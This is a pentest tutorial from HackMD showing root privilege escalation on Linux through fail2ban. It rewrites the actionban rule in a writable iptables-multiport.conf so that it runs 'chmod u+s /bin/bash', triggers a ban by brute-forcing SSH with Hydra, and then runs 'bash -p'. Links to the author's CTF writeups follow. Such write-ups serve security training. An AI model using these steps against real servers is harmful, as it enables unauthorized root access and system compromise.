### What is Fail2Ban? Fail2ban is an intrusion prevention software framework. Fail2Ban is able to reduce the rate of incorrect authentications attempts however it cannot eliminate the risk that weak authentication presents. Configure services to use only two factor or public/private authentication mechanisms if you really want to protect services. So knowing what Fail2Ban generally does, Now assuming a scenario you are performing a pentest and you get access in a server and it has fail2ban but the good thing is the user you have access to the privilege to run `/etc/init.d/fail2ban restart` as root. How do we use this to our advantage of gaining access as root in the server :) ### Knowing your privileges First, run `sudo -l` it'll prompt for a password of the user or not, depends with the configuration of `/etc/sudoers` ![](https://i.imgur.com/fGiX7Yy.png) If the output is as the same as this or might be without the `NOPASSWD` then we have a great chance of getting that root access! Now to check for the groups the user is assigned into: ![](https://i.imgur.com/T8jHjYH.png) The user is also part of the `security` group. Next we look for writeable directories inside `/etc/` hoping we find `/etc/fail2ban/action.d` to do this we can use the command: ```bash= find /etc -writable -ls 2>/dev/null ``` ![](https://i.imgur.com/YVs5q4R.png) This means we can write into the directory `/etc/fail2ban/action.d` which contains the file `iptables-multiport.conf` which contains rules of the actions done by fail2ban ### Privilege Escalation Create a backup file of `iptables-multiport.conf` and name it `iptables-multiport.conf.bak` and then copy it back to `iptables-multiport.conf` where as this makes you the owner of the file and then edit it and comment the `actionban` rule and add a new `actionban` rule and write your command to be executed by root, if it's a reverseshell or anything: ```bash= <-SNIP-> actionban = chmod u+s /bin/bash #actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype> <-SNIP-> ``` ![](https://i.imgur.com/1pCEmcu.png) After editing the file, save it and restart the service: ![](https://i.imgur.com/DgjBHMB.png) Read the `/etc/fail2ban/jail.conf` to know after how many attempts of login is the action then done, and by default it should be `5` tries. To simply get the ban action to be called, we can use Hydra to bruteforce the SSH password for root ![](https://i.imgur.com/GMgGQw6.png) change the command for hydra to something like : ```bash= hydra x.x.x.x ssh -l root -P ~/path/to/wordlist.txt ``` After a few tries, then check the binary `/bin/bash` if it's now setuid ![](https://i.imgur.com/EQSfGXL.png) VOILA! Now the Fun part! Just run `bash -p` ![](https://i.imgur.com/3KhYrHy.png)
Last changed by  
Tahaa Farooq
お前はもう死んでいる
2351

Read more

Hackthebox Cyber Apocalypse 2024 CTF

Hello everybody reading this :), This is my writeup for the challenges hosted in Hackthebox Cyber Apocalypse CTF 2024 with the theme "Hacker Royale"

4/16/2024
PicoCTF 2024 Reverse Engineering Challenges Writeup

Below is my solution upon solving the reverse engineering category from picoCTF 2024. There was a total of 7 reverse engineering challenges. I could say they were pretty straight forward and interesting challenges!

3/26/2024
CyberTalents Writeup (Malware Reverse Engineering)

This is my approach to how i solved the challenges from the category Malware Reverse Engineering that is on the platform of CyberTalents

1/31/2024
DLINK DPH-400SE - Exposure of Sensitive Information to an Unauthorized Actor

With default credential for the guest user “guest:guest” to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users.

10/10/2023
Read more from Tahaa Farooq
Published on HackMD